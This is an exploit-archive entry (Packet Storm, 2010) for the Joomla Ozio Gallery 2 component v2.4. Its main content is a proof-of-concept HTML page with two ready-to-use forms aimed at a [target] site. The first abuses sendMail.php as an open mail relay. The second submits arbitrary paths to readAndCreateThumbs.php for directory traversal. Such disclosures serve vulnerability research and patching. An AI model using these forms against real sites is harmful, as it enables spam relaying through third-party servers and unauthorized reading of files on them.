Joomla Ozio Gallery 2 Mail Relay

2010-06-19T00:00:00
ID PACKETSTORM:90821
Type packetstorm
Reporter jdc
Modified 2010-06-19T00:00:00

Description

                                        
                                            `  
  
<!--  
# Exploit Title: Joomla Component Ozio Gallery 2 Multiple Vulnerabilities  
# Date: 28 May 2010  
# Author: jdc  
# Software Link:   
http://extensions.joomla.org/extensions/photos-a-images/photo-flash-gallery/4883  
# Version: 2.4  
# Tested on: PHP5, MySQL5  
-->  
  
<h2>Ozio Gallery 2</h2>  
<h3>v 2.4</h3>  
  
<h4>Open Mail Relay:</h4>  
  
<form method="post"   
action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/others/sendMail.php">  
<label for="to">To:</label><input id="to" name="to" type="text" /><br />  
<label for="from">From:</label><input id="from" name="from" type="text"   
/><br />  
<label for="subject">Subject:</label><input id="subject" name="subject"   
type="text" /><br />  
<label for="message">Message:</label><textarea id="message"   
name="message"></textarea><br />  
<input type="submit" value="Send"/>  
</form>  
  
  
<h4>Directory Traversal:</h4>  
  
<form method="post"   
action="http://[target]/components/com_oziogallery2/imagin/scripts_ralcr/filesystem/readAndCreateThumbs.php">  
<label for="path">path:</label><input id="path" name="path" type="text"   
/><br />  
<input type="submit" value="Send"/>  
</form>  
  
  
`